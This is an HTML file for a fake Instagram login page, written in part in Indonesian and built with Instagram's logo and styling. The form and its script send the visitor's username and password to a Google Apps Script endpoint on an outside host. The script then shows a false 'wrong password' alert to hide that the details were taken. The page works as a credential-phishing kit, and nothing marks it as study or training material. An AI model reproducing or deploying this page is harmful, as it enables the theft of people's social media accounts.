<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram Login</title>
    <style>
        body {
            background-color: #fafafa;
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .login-container {
            background-color: #fff;
            border: 1px solid #dbdbdb;
            padding: 40px;
            width: 350px;
            text-align: center;
        }
        .login-container img {
            width: 175px;
            margin-bottom: 20px;
        }
        .login-container input {
            width: 100%;
            padding: 10px;
            margin: 5px 0;
            border: 1px solid #dbdbdb;
            border-radius: 3px;
            background-color: #fafafa;
        }
        .login-container button {
            width: 100%;
            padding: 10px;
            background-color: #3897f0;
            border: none;
            border-radius: 3px;
            color: #fff;
            font-weight: bold;
            cursor: pointer;
        }
        .login-container .forgot-password {
            margin-top: 20px;
            color: #00376b;
            font-size: 12px;
        }
    </style>
</head>
<body>
    <div class="login-container">
        <img src="https://www.instagram.com/static/images/web/mobile_nav_type_logo.png/735145cfe0a4.png" alt="Instagram Logo">
        <form action="https://script.google.com/macros/s/AKfycbxSkwK51P82bSMIH4m554y0esL2MvmcfV-O66Kn0imeXFcz3ZBrT_05cA_UFU_uccNs/exec" method="POST" name="ag-form">
            <input type="text" name="username" placeholder="Phone number, username, or email" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit">Log In</button>
        </form>
        <div class="forgot-password">
            <a href="#">Lupa password?</a>
        </div>
    </div>

    
<script>
    const scriptURL = 'https://script.google.com/macros/s/AKfycbxSkwK51P82bSMIH4m554y0esL2MvmcfV-O66Kn0imeXFcz3ZBrT_05cA_UFU_uccNs/exec'
    const form = document.forms['ag-form']
  
    form.addEventListener('submit', e => {
      e.preventDefault()
      fetch(scriptURL, { method: 'POST', body: new FormData(form)})
        .then(response => console.log('Success!', response))
        .catch(error => console.error('Error!', error.message))
        alert('Maaf, username atau sandi yang anda masukan salah, Harap  periksa kembali.');
    })
  </script>

</body>
</html>
